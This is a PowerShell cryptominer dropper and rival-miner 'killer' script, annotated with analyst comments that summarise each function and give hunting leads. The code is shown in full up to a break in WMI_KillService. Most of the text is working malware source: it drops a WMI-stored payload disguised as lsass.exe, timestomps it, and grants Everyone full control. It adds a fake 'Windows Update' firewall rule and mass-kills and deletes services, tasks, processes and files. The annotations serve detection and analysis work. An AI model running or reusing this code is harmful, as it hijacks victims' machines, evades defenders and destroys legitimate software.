<#
  ANALYST NOTES (review). Despite the "shell" label this is a PowerShell
  sample that was collapsed onto a few lines by whatever scraped it; the
  code is left exactly as found and only these block comments were added.
  What the script does, as visible in the code itself:
    * reads a base64 payload and two PIDs (mPId, nPId) from a custom WMI
      class, root\cimv2:PowerShell_Command (payload property YZZLFGYJMZ),
      so the payload lives in the WMI repository rather than on disk;
    * writes it to C:\Windows\Temp\lsass.exe - a name chosen to blend in
      with the real LSASS - pads the file to 10 MB or 100 MB, copies
      Explorer.exe's timestamps onto it, adds a firewall allow rule titled
      "Windows Update" and starts it hidden;
    * acts as a "killer" for rival miners: deletes services, scheduled
      tasks, processes and files matching long block lists, overwrites the
      hosts file and strips other WMI event subscriptions;
    * clears every Windows event log once it is done.
  Hunting leads are noted per function below.
#>
$ErrorActionPreference = 'SilentlyContinue' Set-Location "$Env:WinDir\System32" $Env:Path=$Env:Path+";$Env:WinDir;$Env:WinDir\System32" $FileName = "lsass.exe" $InstallDir = "C:\Windows\Temp" $InstallPath = "C:\Windows\Temp\lsass.exe" $WmiName_Miner = "YZZLFGYJMZ" $WmiName = "root\cimv2:PowerShell_Command" $mPId = ([WmiClass]$WmiName).Properties['mPId'].Value $nPId = ([WmiClass]$WmiName).Properties['nPId'].Value Write-Host "[i] FileName : $FileName" Write-Host "[i] InstallDir : $InstallDir" Write-Host "[i] InstallPath: $InstallPath"
<# WMI_DeleteFile: for each path, retries Remove-Item up to 30 times
   (100 ms apart), renaming to <path>.tmp on the last attempt, then creates
   a DIRECTORY of the same name with a fixed 2009 timestamp and
   ReadOnly/System/Hidden attributes - the directory squats on the path so
   a rival cannot drop its binary there again.
   Hunt: hidden+system directories whose names end in .exe under
   Windows\Temp, ProgramData or user temp folders; files or directories
   dated 07/14/2009 that were created by a PowerShell process. #>
Function WMI_DeleteFile($PathArray) { foreach ($Path in $PathArray) { for ($i=0; $i -Lt 30; $i++) { Remove-Item $Path -Force -EA 0 if (Test-Path $Path) { Start-Sleep -Milliseconds 100 if ($i -Eq 29) { Move-Item $Path ($Path+'.tmp') -Force -EA 0 } } else { break } } $Temp = New-Item $Path -Type Directory -EA 0 if ($?) { $Temp.CreationTime = $Temp.LastWriteTime = $Temp.LastAccessTime = '07/14/2009 07:04:08' $Temp.Attributes = "Readonly","System","Hidden" } } }
<# WMI_FileTime: timestomping. Copies Explorer.exe's CreationTime onto all
   three timestamps of $DestPath (falls back to a fixed 2009 date when
   Explorer.exe cannot be read). Setting timestamps through this API
   generally changes only $STANDARD_INFORMATION, so the MFT $FILE_NAME
   timestamps and the USN journal still show the real drop time. #>
Function WMI_FileTime($DestPath, $SrcPath="$Env:WinDir\Explorer.exe") { $Time = '07/14/2009 07:31:13' $SrcFile = Get-Item $SrcPath -Force -EA 0 if ($SrcFile -Ne $Null) { $Time = $SrcFile.CreationTime } $DestFile = Get-Item $DestPath -Force -EA 0 $DestFile.CreationTime = $DestFile.LastWriteTime = $DestFile.LastAccessTime = $Time }
<# WMI_CheckDiskSpace: $True when the system drive (a fixed disk,
   DriveType 3) has at least 1 GB free; decides how far the dropped file
   is padded in WMI_MakeBigFile. #>
Function WMI_CheckDiskSpace { $Result = $False $Test = Get-WmiObject -Class Win32_LogicalDisk | Where-Object {($_.DriveType -Eq 3) -And ($_.DeviceID -Eq $Env:SystemDrive) -And ($_.FreeSpace -Ge 1GB)} if ($Test -Ne $Null) { $Result = $True } return $Result }
<# WMI_MakeBigFile: opens $FilePath, seeks to 10 MB (100 MB when disk space
   allows) and writes 2990 random bytes there, so the file ends up far
   larger than the payload - presumably to exceed size limits of on-access
   scanners (TODO confirm against the products targeted). The payload is
   base64-decoded from the WMI class property and written at offset 0.
   Hunt: enumerate root\cimv2 for non-standard classes (here
   PowerShell_Command) carrying large string properties; a PowerShell
   process writing an .exe into Windows\Temp. #>
Function WMI_MakeBigFile($FilePath) { $MakeLength = 10MB if (WMI_CheckDiskSpace) { $MakeLength = 100MB } $FS = New-Object System.IO.FileStream($FilePath, [System.IO.FileMode]::OpenOrCreate, [System.IO.FileAccess]::ReadWrite) $Null = $FS.Seek($MakeLength, [System.IO.SeekOrigin]::Begin) $VerLength = 2990 for ($i=1; $i -Le $VerLength; $i++) { $FS.WriteByte((Get-Random -Min 0 -Max 255)) } if (!(Test-Path 
Variable:MinerBytes)) { $Miner = ([WmiClass]$WmiName).Properties[$WmiName_Miner].Value $MinerBytes = [System.Convert]::FromBase64String($Miner) } $Null = $FS.Seek(0, [System.IO.SeekOrigin]::Begin) $Length = $MinerBytes.Length $WriteLength = $FS.Write($MinerBytes, 0, $Length) $FS.Flush() $FS.Close() }
<# WMI_StartMiner: weakens ACLs (takeown plus icacls/cacls granting
   Everyone:F on C:\Windows\Temp and on the dropped file), drops the
   payload, adds a legacy "netsh firewall" allowed-program rule titled
   "Windows Update", timestomps, starts the file hidden and stores its PID
   back into the WMI class (mPId).
   Hunt: netsh.exe / icacls.exe / takeown.exe / cacls.exe spawned by
   powershell.exe; firewall rules whose display name does not match their
   program path; lsass.exe running from anywhere but System32 (the script's
   own WMI_KillFake exempts $InstallPath by path, so it never flags itself). #>
Function WMI_StartMiner { $Null = TakeOwn.exe /F $InstallDir $Null = iCACLs.exe $InstallDir /Reset /T /C $Null = iCACLs.exe $InstallDir /Grant Everyone:F /T /C $Null = CACLs.exe $InstallPath /E /G Everyone:F /C if (!(Test-Path $InstallDir)){ New-Item $InstallDir -Type Directory } if (!((Get-Item $InstallPath -Force -EA 0) -is [IO.FileInfo])) { Remove-Item $InstallPath -Recurse -Force -EA 0 } WMI_MakeBigFile $InstallPath if (Test-Path $InstallPath) { $Null = NetSH Firewall Add AllowedProgram $InstallPath "Windows Update" Enable WMI_FileTime $InstallPath $Process = Start-Process -FilePath $InstallPath -WindowStyle Hidden -PassThru $ProcessId = $($Process.Id) if ($ProcessId -ne $NULL) { Write-Host "[+] New Process Id is $ProcessId" $Wmi=New-Object Management.ManagementClass($WmiName) $Wmi.SetPropertyValue('mPId',$ProcessId) $Null=$Wmi.Put() } else { Write-Host "[-] New Process Id is NULL" } } }
<# WMI_Killer: rival-miner cleanup driven by hard-coded block lists -
   service names (disabled, stopped and deleted through Win32_Service),
   scheduled task names (schtasks /Delete), process command-line fragments
   typical of XMRig-style miners (stratum+, --donate-level, cryptonight ...),
   PowerShell processes holding ESTABLISHED TCP connections on common pool
   ports (parsed from "netstat -anop TCP"), and a list of process names.
   Its own PIDs ($PId, $mPId, $nPId) and $InstallPath are spared; killed
   binaries are handed to WMI_DeleteFile, except a set of genuine Windows
   binaries (cmd, explorer, notepad, svchost, wuapp) that are killed but
   not deleted.
   Hunt: bursts of Win32_Service.Delete, schtasks /Delete and Stop-Process
   from a single PowerShell process; System log 7040 (start type changed
   to Disabled) immediately followed by service removal; netstat.exe as a
   child of powershell.exe. #>
Function WMI_Killer { $SrvName = "SxS","WinSvc","xWinWpdSrv","mssecsvc2.0","mssecsvc2.1","DbSecuritySpt","SVSHost","SVNSHost","Microsoft Telemetry","lsass","Microsoft","system","Oracleupdate","CLR","sysmgt","\gm","WmdnPnSN","Sougoudl","National","Nationaaal","Natimmonal","Nationaloll","Nationalmll","Nationalaie","Nationalwpi","WinHelp32","WinHelp64","Samserver","RpcEptManger","NetMsmqActiv Media NVIDIA","NetMsmqActiv NuGet NVIDIA","NetActiv NuGet NVIDIA","Sncryption Media Playeq","windows-nvidia-firewall","windows-nvidia-firewall1-nvidia","windows-nvidia-firewall1-nvidia12","YiluzhuanqianSer","svchost","WindwosUpdate","ClipBooks","NetUdpPortSharing","IPSECS","360rTys",".Net CLR","Netuser CLR","Windows Help System Myss","MessengerBengal","WinVaultSvc","Player","Windows Audio 
Control","WinHasdelp32","WinHasdadelp32","WissssssnHelp32","Xtfy","Xtfya","Xtfyxxx","windows dureall (RPC) Remote Down","Remote UProcedure all (RPC)","WindowseRemotes UProcedure Call (RPC)","Helper Remotes Procedure Call (RPC)","Remote DOWN windows dureall (RPC)","Piagnostics Hracking","Serhiez","SuperProServer","ALGM","Windows32_Update","wmiApSrvs","wmiApServs","NetTcpService","SvcNlauser","Windows Managers","Windows_Update","Microsoft MR","Windows.UserinSystem.Net CLR","IronPython Windows Console","IronPythoe Windows Atmelup","PronPythoe Windows Atmealup","PronPythoe Windows Atmealug","DNS Server","iis","Zational","Application Layre Gateway Service","CardsService","Services","clr_optimization_v3.0.50727_32","taskmgr1","win","WinServic","WiFiService","Alimama","AlipaySvcSec","Contenteplspcon","SRDSL","MpeSvc","WerSvc.NET","Windows.Net CLR","DocFilePropertray","WinTcpAutoProxySvc","WebServers","ExpressVNService",'WWW.DDOS.CN.COM','WinHelpSvcs','aspnet_staters','clr_optimization','AxInstSV' foreach ($Srv in $SrvName) { if ((Get-Service -Name $Srv -EA 0) -Eq $Null) { continue } $Test = Get-WmiObject -Class Win32_Service | Where-Object {$_.Name -Eq $Srv} if ($Test -Ne $Null) { $SrvPId = $($Test.ProcessId) $SrvName = $($Test.Name) $SrvPath = $($Test.PathName) Write-Host "[K] $SrvPId`t$SrvName`t$SrvPath" $Null = $Test.ChangeStartMode('Disabled') if ($SrvPId -Ne 0) { Get-Process -Id $SrvPId -EA 0 | Stop-Process -Force } $Null = $Test.StopService() $Null = $Test.Delete() } } $TaskName = "my1","Mysa","Mysa1","Mysa2","Mysa3","ok","Oracle Java","Oracle Java Update","Microsoft Telemetry","Spooler SubSystem Service","Oracle Products Reporter","Update service for products","gm","ngm","Sorry","Windows_Update","Update_windows","WindowsUpdate1","WindowsUpdate2","WindowsUpdate3","AdobeFlashPlayer","FlashPlayer1","FlashPlayer2","FlashPlayer3","IIS","WindowsLogTasks","System Log Security 
Check","Update","Update1","Update2","Update3","Update4","DNS","SYSTEM","DNS2","SYSTEMa","skycmd","Miscfost","Netframework","Flash","RavTask","GooglePinginConfigs","HomeGroupProvider","MiscfostNsi","WwANsvc","Bluetooths","Ddrivers","DnsScan","WebServers","Credentials","TablteInputout","werclpsyport","HispDemorn","LimeRAT-Admin","DnsCore","Update service for Windows Service","DnsCore","ECDnsCore","SystemFlushDns","Microsoft Assist Job","WindowsMonitor","blackball","WindowsSystemHelper","WindowsUpdateMonitor" foreach ($Task in $TaskName) { $Temp = '"'+$Task+'"' SchTasks.exe /Delete /TN $Temp /F 2> $Null } $CmdLine = Get-WmiObject -Class Win32_Process | Where-Object { ( $_.CommandLine -Like '*cryptonight*' ) -Or ( $_.CommandLine -Like '*stratum+*' ) -Or ( $_.CommandLine -Like '*-p x*' ) -Or ( $_.CommandLine -Like '*--donate-level*' ) -Or ( $_.CommandLine -Like '*--max-cpu-usage*' ) -Or ( $_.CommandLine -Like '*--keepalive*' ) -Or ( $_.CommandLine -Like '*--variant*' ) -Or ( $_.CommandLine -Like '*--nicehash*' ) -Or ( $_.CommandLine -Like '*pool.electroneum.hashvault.pro*' ) -Or ( $_.CommandLine -Like "* -c `"*\cfg*`"" ) -Or ( $_.CommandLine -Like "* Win7" ) -Or ( $_.CommandLine -Like "*ftp -s:*" ) -Or ( $_.CommandLine -Like "*\test\open.bat*" ) -Or ( $_.CommandLine -Like "*S]&cd&echo *" ) } if ($CmdLine -ne $Null) { $PathArray = @() foreach ($m in $CmdLine) { $Path = $($m.Path) $EvId = $($m.ProcessId) if (($EvId -eq $PId) -or ($EvId -eq $mPId) -Or ($Path -Eq $InstallPath)) { continue } Write-Host "[K] $EvId`t$Path" $Null = $m.Terminate() if (($Path -Eq "$Env:WinDir\System32\cmd.exe") -Or ($Path -Eq "$Env:WinDir\SysWOW64\cmd.exe") -Or ($Path -Eq "$Env:WinDir\Explorer.exe") -Or ($Path -Eq "$Env:WinDir\Notepad.exe") -Or ($Path -Eq "$Env:WinDir\System32\Notepad.exe") -Or ($Path -Eq "$Env:WinDir\System32\SvcHost.exe") -Or ($Path -Eq "$Env:WinDir\SysWOW64\SvcHost.exe") -Or ($Path -Eq "$Env:WinDir\System32\WUApp.exe") -Or ($Path -Eq "$Env:WinDir\SysWOW64\WUApp.exe")) { 
continue } if ($PathArray -NotContains $Path) { $PathArray+=$Path } } WMI_DeleteFile($PathArray) } [array]$psids = Get-Process -Name PowerShell | Sort CPU -Descending | ForEach-Object {$_.Id} $tcpconn = NetStat -anop TCP if ($psids -ne $null) { foreach ($t in $tcpconn) { $line = $t.split(' ')| ?{$_} if ($line -eq $null) { continue } if (($psids[0] -eq $line[-1]) -and $t.contains("ESTABLISHED") -and ($t.contains(":80 ") -or $t.contains(":443 ") -or $t.contains(":1111") -or $t.contains(":2222") -or $t.contains(":3333") -or $t.contains(":4444") -or $t.contains(":5555") -or $t.contains(":6666") -or $t.contains(":7777") -or $t.contains(":8888") -or $t.contains(":9999") -or $t.contains(":13333") -or $t.contains(":14433") -or $t.contains(":14444") -or $t.contains(":45560") -Or $t.contains(":45700") -or $t.contains(":65333"))) { $evid = $line[-1] if (($evid -eq $PId) -or ($evid -eq $mPId) -or ($evid -eq $nPId)) { continue } Write-Host "[K] Miner PId: $evid" Get-Process -Id $evid -EA 0 | Stop-Process -Force } } } foreach ($t in $tcpconn) { $line = $t.split(' ')| ?{$_} if (!($line -is [array])) { continue } if (($line[-3] -ne $null) -and $t.contains("ESTABLISHED") -and ($line[-3].contains(":1111") -or $line[-3].contains(":2222") -or $line[-3].contains(":3333") -or $line[-3].contains(":4444") -or $line[-3].contains(":5555") -or $line[-3].contains(":6666") -or $line[-3].contains(":7777") -or $line[-3].contains(":8888") -or $line[-3].contains(":9999") -or $line[-3].contains(":13333") -or $line[-3].contains(":14433") -or $line[-3].contains(":14444") -or $line[-3].contains(":45560") -Or $line[-3].contains(":45700") -or $line[-3].contains(":65333") -or $line[-3].contains(":55335") -Or $line[-3].contains(":10001") -Or $line[-3].contains(":13531"))) { $evid = $line[-1] if (($evid -eq $PId) -or ($evid -eq $mPId) -or ($evid -eq $nPId)) { continue } Write-Host "[K] Miner PId: $evid" Get-Process -Id $evid -EA 0 | Stop-Process -Force } } $Miner = 
"SC","WerMgr","WerFault","DW20","msinfo","XMR*","xmrig*","minerd","*Miner*","MinerGate","Carbon","yamm1","upgeade","auto-upgeade",'svshost',"svnshost","SystemIIS","SystemIISSec","avast*",'WindowsUpdater*',"WindowsDefender*","WindowsService*","Windows","update","carss","service","csrsc","cara","javaupd","gxdrv","lsmose","lsmosee","secuams","SQLEXPRESS_X64_86","Calligrap","Sqlceqp","Setting","Uninsta","Setring","Galligrp","Imaging","taskegr","Terms","Terms.EXE","360","8866","9966","9696","9797","svchosti","SearchIndex","Avira","cohernece","win","SQLforwin","xig*","taskmgr1","Workstation","ress","explores","zs" foreach ($m in $Miner) { Get-Process -Name $m -EA 0 | Stop-Process -Force } }
<# WMI_KillFake: kills processes that masquerade as Windows binaries
   (ctfmon, svchost, lsass, csrss ... running outside System32/SysWOW64)
   and anything running from a long list of "unusual" directories (Temp,
   PerfLogs, $Recycle.Bin, Users\Public, Fonts, Help ...), then deletes
   their files through WMI_DeleteFile. For paths containing "Microsoft"
   the exemption rests on version-resource strings (CompanyName,
   FileDescription, InternalName), which any file can claim - it is not an
   Authenticode check. The directory list also catches legitimate
   software, so a host that ran this may have lost benign processes and
   files; do not use its output as a clean-up list. #>
Function WMI_KillFake { $WinDir = "$Env:WinDir\" $SysDir = "$Env:WinDir\System32\" $WowDir = "$Env:WinDir\SysWOW64\" $CmdLine = Get-WmiObject -Class Win32_Process | Where-Object { ($_.Path -Ne $Null) -And ( ( $_.Name -Eq "ctfmon.exe" -And $_.Path -Ne $SysDir+"ctfmon.exe" -And $_.Path -Ne $WowDir+"ctfmon.exe" ) -Or ( $_.Name -Eq "DllHost.exe" -And $_.Path -Ne $SysDir+"DllHost.exe" -And $_.Path -Ne $WowDir+"DllHost.exe" ) -Or ( $_.Name -Eq "SvcHost.exe" -And $_.Path -Ne $SysDir+"SvcHost.exe" -And $_.Path -Ne $WowDir+"SvcHost.exe" ) -Or ( $_.Name -Eq "TaskMgr.exe" -And $_.Path -Ne $SysDir+"TaskMgr.exe" -And $_.Path -Ne $WowDir+"TaskMgr.exe" ) -Or ( $_.Name -Eq "w3wp.exe" -And $_.Path -Ne $SysDir+"inetsrv\w3wp.exe" -And $_.Path -Ne $WowDir+"inetsrv\w3wp.exe" ) -Or ( $_.Name -Eq "WmiPrvSE.exe" -And $_.Path -Ne $SysDir+"Wbem\WmiPrvSE.exe" -And $_.Path -Ne $WowDir+"Wbem\WmiPrvSE.exe" ) -Or ( $_.Name -Eq "smss.exe" -And $_.Path -Ne $SysDir+"smss.exe" ) -Or ( $_.Name -Eq "csrss.exe" -And $_.Path -Ne $SysDir+"csrss.exe" ) -Or ( $_.Name -Eq "Lsass.exe" -And $_.Path -Ne $SysDir+"Lsass.exe" ) -Or ( $_.Name -Eq "WinLogon.exe" -And $_.Path -Ne $SysDir+"WinLogon.exe" ) -Or ( $_.Name -Eq "Services.exe" -And $_.Path -Ne $SysDir+"Services.exe" ) -Or ( $_.Name -Eq "Spoolsv.exe" -And $_.Path -Ne 
$SysDir+"Spoolsv.exe" ) -Or ( $_.Name -Eq "TaskHost.exe" -And $_.Path -Ne $SysDir+"TaskHost.exe" ) -Or ( $_.Name -Eq "ConIME.exe" -And $_.Path -Ne $SysDir+"ConIME.exe" ) -Or ( $_.Name -Eq "ConHost.exe" -And $_.Path -Ne $SysDir+"ConHost.exe" ) -Or ( $_.Name -Eq "RdpClip.exe" -And $_.Path -Ne $SysDir+"RdpClip.exe" ) -Or ( $_.Name -Eq "Explorer.exe" -And $_.Path -Ne $WinDir+"Explorer.exe" ) -Or ( $_.Name -Eq "ChsIME.exe" -And $_.Path -Ne $SysDir+"InputMethod\CHS\ChsIME.exe" ) -Or ( $_.Name -Eq "msdtc.exe" -And $_.Path -Ne $SysDir+"msdtc.exe" ) -Or ( $_.Name -Like "*.bat" ) -Or ( $_.Name -Like "*.pif" ) -Or ( $_.Name -Like "*.com" ) -Or ( $_.Name -Like "*.ini" ) -Or ( $_.Name -Like "*.html" ) -Or ( $_.Path -Like "*HashFish*" ) -Or ( $_.Path -Like "*\WebDAV\*" ) -Or ( $_.Path -Like "*:\Inetpub\*" ) -Or ( $_.Path -Like "*:\PerfLogs\*" ) -Or ( $_.Path -Like "*:\$Recycle.Bin\*" ) -Or ( $_.Path -Like "*:\Users\Public\*" ) -Or ( ( $_.Path -Like "*:\Users\*\AppData\Roaming\*" ) -And ( ( $_.Path -NotMatch "360se" ) -And ( $_.Path -NotMatch "baidu" ) ) ) -Or ( $_.Path -Like "$Env:WinDir\IME\*" ) -Or ( $_.Path -Like "$Env:WinDir\Web\*" ) -Or ( $_.Path -Like "$Env:WinDir\Help\*" ) -Or ( $_.Path -Like "$Env:WinDir\Temp\*" ) -Or ( $_.Path -Like "$Env:WinDir\Tasks\*" ) -Or ( $_.Path -Like "$Env:WinDir\Debug\*" ) -Or ( $_.Path -Like "$Env:WinDir\Fonts\*" ) -Or ( $_.Path -Like "$Env:WinDir\Media\*" ) -Or ( $_.Path -Like "$Env:WinDir\Config\*" ) -Or ( $_.Path -Like "$Env:WinDir\Cursors\*" ) -Or ( $_.Path -Like "$Env:WinDir\System\*" ) -Or ( $_.Path -Like "$Env:WinDir\Systems\*" ) -Or ( $_.Path -Like "$Env:WinDir\Security\*" ) -Or ( $_.Path -Like "$Env:WinDir\Resources\*" ) -Or ( $_.Path -Like "$Env:WinDir\CSS\*" ) -Or ( $_.Path -Like "$Env:WinDir\IIS\*" ) -Or ( $_.Path -Like "$Env:WinDir\dispmrroe\*" ) -Or ( $_.Path -Like "$Env:WinDir\miagration\*" ) -Or ( $_.Path -Like "$Env:WinDir\InfusedAppe\*" ) -Or ( $_.Path -Like "C:\WebKitsSDK\*" ) -Or ( $_.Path -Like 
"$Env:WinDir\WindowsUpdata\*" ) -Or ( $_.Path -Like "$Env:WinDir\WindowsUpdate\*" ) -Or ( $_.Path -Like "$Env:WinDir\AppDiagnostics\*" ) -Or ( $_.Path -Like "$Env:WinDir\NetworkDistribution\*" ) -Or ( $_.Path -Like "$Env:WinDir\System32\Config\*" ) -Or ( $_.Path -Like "$Env:WinDir\SysWOW64\Config\*" ) -Or ( $_.Path -Like "*%ProgramFiles%\*" ) -Or ( $_.Path -Like "*:\Program Files\Microsoft *" ) -Or ( $_.Path -Like "*:\Program Files (x86)\Microsoft *" ) -Or ( $_.Path -Like "*:\Program Files (x86)\NetMeeting\*" ) -Or ( $_.Path -Like "*:\Program Files (x86)\Windows Photo\*" ) -Or ( $_.Path -Like "*:\Program Files (x86)\Windows Explorer\*" ) -Or ( (( $_.Path -Like "*:\Program Files\Windows NT\*" ) -Or ( $_.Path -Like "*:\Program Files (x86)\Windows NT\*" )) -And ($_.Name -Ne "wordpad.exe")) ) -Or ( ( $_.Path -Like "*:\Program Files\Linux*" ) -Or ( $_.Path -Like "*:\Program Files (x86)\Linux*" ) ) -Or ( $_.Path -Like "$Env:WinDir\php.exe" ) -Or ( $_.Path -Like "$Env:WinDir\test.exe" ) -Or ( $_.Path -Like "$Env:WinDir\Terms*" ) -Or ( $_.Path -Like "$Env:WinDir\Ru*.exe" ) -Or ( $_.Path -Like "*\winvhost.exe" ) -Or ( ( $_.Path -Like "*:\ProgramData\*" ) -And ( ( $_.Path -NotMatch "aliyun" ) -And ( $_.Path -NotMatch "Windows Defender" ) -And ( $_.Path -NotMatch "Oracle" ) -And ( $_.Path -NotMatch "Java" ) ) ) -Or ( $_.Path -Match ":\\Program Files\\\w*\.exe" ) -Or ( $_.Path -Match ":\\Program Files \(x86\)\\\w*\.exe" ) -Or ( $_.Path -Like "*:\Users\*\AppData\Local\Temp\*" ) -Or ( $_.Path -Like "*:\Documents and Settings\*\Local Settings\Temp\*" ) -Or ( $_.Path -Like "*:\Docume~1\*\Locals~1\Temp\*" ) -Or ( $_.Path -Like "*:\Users\*$\*" ) } if ($CmdLine -Ne $Null) { $PathArray = @() foreach ($m in $CmdLine) { $Path = $($m.Path) $EvId = $($m.ProcessId) if (($EvId -Eq $PId) -Or ($EvId -Eq $mPId) -Or ($Path -Eq $InstallPath)) { continue } if ($Path -Match "Microsoft") { $VerInfo = Get-Item $Path -Force -EA 0 | Select-Object -ExpandProperty VersionInfo if (($VerInfo.CompanyName 
-Eq "Microsoft Corporation") -And ($VerInfo.CompanyName -Ne "NVIDIA Corporation") -And ($VerInfo.FileDescription -NotMatch "Kinco") -And ($VerInfo.InternalName -Ne "WerFault")) { continue } } Write-Host "[K] $EvId`t$Path" $Null = $m.Terminate() if ($PathArray -NotContains $Path) { $PathArray+=$Path } } WMI_DeleteFile($PathArray) } }
<# IsWhiteSrv: $True when $SrvName is in the hard-coded allow list of
   vendor services (AV, backup, virtualization, printer, Intel/AMD ...)
   that WMI_KillService must leave alone. #>
Function IsWhiteSrv($SrvName) { $Result = $False $WhiteListArray = 'MpsSvc','Microsoft Office Groove Audit Service','Microsoft SharePoint Workspace Audit Service','SQL Server Distributed Replay Client','SQL Server Distributed Replay Controller','FileZilla Server','Wing FTP Server','Cerberus FTP Server','SolarWinds TFTP Server','EasyFZS Server','VMware NAT Service','VMware Physical Disk Helper Service','Safedog Update Center','Alibaba Security Aegis Detect Service','Alibaba Security Aegis Update Service','Agent Update','QEMU Guest Agent Check','QEMU Guest Agent VSS Provider','Net Driver HPZ12','Pml Driver HPZ12','HP LaserJet Service','HP Port Resolver','HP Status Server','HP Health Check Service','HP Support Assistant Service','MyEpson Portal Service','AMD External Events Utility','AMD FUEL Service','Intel(R) PROSet Monitoring Service','Intel(R) Capability Licensing Service Interface','Intel(R) Capability Licensing Service TCP IP Interface','Intel(R) TPM Provisioning Service','Intel(R) SUR QC SAM','Bluetooth Device Monitor','Bluetooth Media Service','Bluetooth OBEX Service','Intel Unite Guest Access Service','Intel(R) Security Assist','Intel(R) ME Service','Stereo Service','memcached Server','Oracle VM Service','HP Application Lifecycle Management','iPod Service','Apple Mobile Device','Apple Mobile Device Service','Samsung UPD Service','Samsung Update Plus','WebCTRL 4 Service','SSWeb 3.0 Service','SSWeb 4 Service','avast! Antivirus','avast! 
Firewall','F-Secure Network Request Broker','F-Secure WebUI Daemon','Core Mail Protection','Core Scanning Server','Core Scanning ServerEx','Online Protection System','Quick Update Service','V3 Service','V3 Clinic Service','Sophos Agent','Sophos Clean Service','Sophos Health Service','Sophos MCS Agent','Sophos MCS Client','Sophos Safestore Service','Sophos File Scanner Service','Sophos AutoUpdate Service','Sophos Web Control Service','Sophos Device Control Service','McAfee SiteAdvisor Enterprise Service','Zabbix Agent','Synology Drive VSS Service x64','Cloud Station Drive VSS Service','Ksyun Agent','Ksyun Update','Symantec AntiVirus','Platinum Host Service','CloudBerry Backup Service','ZoneAlarm ICM Service','Parallels Tools Service','FlexNet Licensing Service','NetOp Host for NT Service','Steam Client Service','EaseUS Agent','Sense Shield Service' foreach ($WhiteList in $WhiteListArray) { if ($WhiteList -Eq $SrvName) { $Result = $True break } } return $Result }
<# WMI_KillService: three heuristic sweeps over Win32_Service, each
   disabling, stopping and deleting its matches (and queueing the binary
   for WMI_DeleteFile unless it is svchost): (1) suspicious names - all
   digits, Nati*/Wati*/Mpe*/Mps*, ".Net CLR", *WOW*, *WinTcpAutoProxy*,
   "Microsoft Software <Name>", or a name containing a space whose PathName
   carries none of the listed vendor strings, minus IsWhiteSrv; (2)
   services whose DisplayName equals their Name and whose PathName ends in
   "-k <Name>" - a fabricated svchost group; (3) a handful of legacy
   service names (Ias, Irmon, Nla, Ntmssvc, Wmi ...) hosted in netsvcs
   with an 8-character DisplayName.
   Hunt: the same name/path patterns are useful for spotting rival
   implants, but compare against a known-good service baseline rather
   than trusting this list - it has its own false positives. #>
Function WMI_KillService { $SrvArray = Get-WmiObject -Class Win32_Service | Where-Object { ( $_.Name -Ne $Null ) -And ( ( $_.Name -Match "^\d+$" ) -Or ( $_.Name -Match "^Nati\w+" ) -Or ( $_.Name -Match "^Wati\w+" ) -Or ( $_.Name -Match "^Mpe\w+" ) -Or ( $_.Name -Match "^Mps\w+" ) -Or ( $_.Name -Match ".*\.Net CLR.*" ) -Or ( $_.Name -Match "^WOW.*" ) -Or ( $_.Name -Match ".*WOW.*" ) -Or ( $_.Name -Match ".*WinTcpAutoProxy.*" ) -Or ( ( $_.DisplayName -Eq "Microsoft Software "+$_.Name ) -Or ( $_.DisplayName -Eq "ASP.NET State Services" ) ) -Or ( ( $_.Name -Match "\w+ \w+" ) -And ( ( $_.PathName -NotMatch "Alibaba" ) -And ( $_.PathName -NotMatch "JCloudHIDS" ) -And ( $_.PathName -NotMatch "SafeDog" ) -And ( $_.PathName -NotMatch "KsYunAgent" ) -And ( $_.PathName -NotMatch "CloudBerry" ) -And ( $_.PathName -NotMatch "Avast" ) -And ( $_.PathName -NotMatch "AhnLab" ) -And ( $_.PathName -NotMatch "F-Secure" ) -And ( $_.PathName -NotMatch "McAfee" ) -And ( $_.PathName -NotMatch "Quick Heal" ) -And ( $_.PathName 
-NotMatch "Sophos" ) -And ( $_.PathName -NotMatch "Seqrite" ) -And ( $_.PathName -NotMatch "Norton" ) -And ( $_.PathName -NotMatch "Symantec" ) -And ( $_.PathName -NotMatch "Trend Micro" ) -And ( $_.PathName -NotMatch "ZoneAlarm" ) -And ( $_.PathName -NotMatch "ColdFusion" ) -And ( $_.PathName -NotMatch "PDF Architect" ) -And ( $_.PathName -NotMatch "PostgreSQL" ) -And ( $_.PathName -NotMatch "Synology" ) -And ( $_.PathName -NotMatch "TongFang" ) -And ( $_.PathName -NotMatch "IBM" ) -And ( $_.PathName -NotMatch "Dell" ) -And ( $_.PathName -NotMatch "Lenovo" ) -And ( $_.PathName -NotMatch "ThinkPad" ) -And ( $_.PathName -NotMatch "Apple" ) -And ( $_.PathName -NotMatch "Intel" ) -And ( $_.PathName -NotMatch "ATI" ) -And ( $_.PathName -NotMatch "NVIDIA" ) -And ( $_.PathName -NotMatch "HP" ) -And ( $_.PathName -NotMatch "Canon" ) -And ( $_.PathName -NotMatch "EPSON" ) -And ( $_.PathName -NotMatch "Zabbix" ) -And ( $_.PathName -NotMatch "Seagate" ) -And ( $_.PathName -NotMatch "Parallels" ) -And ( $_.PathName -NotMatch "SenseShield" ) ) ) ) } if ($SrvArray -Ne $Null) { $PathArray = @() foreach ($Srv in $SrvArray) { $SrvPId = $($Srv.ProcessId) $SrvName = $($Srv.Name) $SrvPath = $($Srv.PathName) if (IsWhiteSrv($SrvName)) { continue } Write-Host "[K] $SrvPId`t$SrvName`t$SrvPath" if ($SrvPId -Ne 0) { Get-Process -Id $SrvPId -EA 0 | Stop-Process -Force } if (($SrvPath -Like "$Env:WinDir\System32\SvcHost.exe*") -Or ($SrvPath -Like "$Env:WinDir\SysWOW64\SvcHost.exe*")) { } else { if ($PathArray -NotContains $SrvPath) { $PathArray+=$SrvPath } } $Null = $Srv.ChangeStartMode('Disabled') $Null = $Srv.StopService() $Null = $Srv.Delete() } WMI_DeleteFile($PathArray) } $SrvArray = Get-WmiObject -Class Win32_Service | Where-Object { ( $_.Name -Ne $Null ) -And ( ( $_.Name -Eq $_.DisplayName ) -Or ( $_.Name -Eq "COM+ Event Systems" ) ) -And ( $_.PathName -Match $_.Name ) } if ($SrvArray -Ne $Null) { foreach ($Srv in $SrvArray) { $SrvPId = $($Srv.ProcessId) $SrvName = $($Srv.Name) 
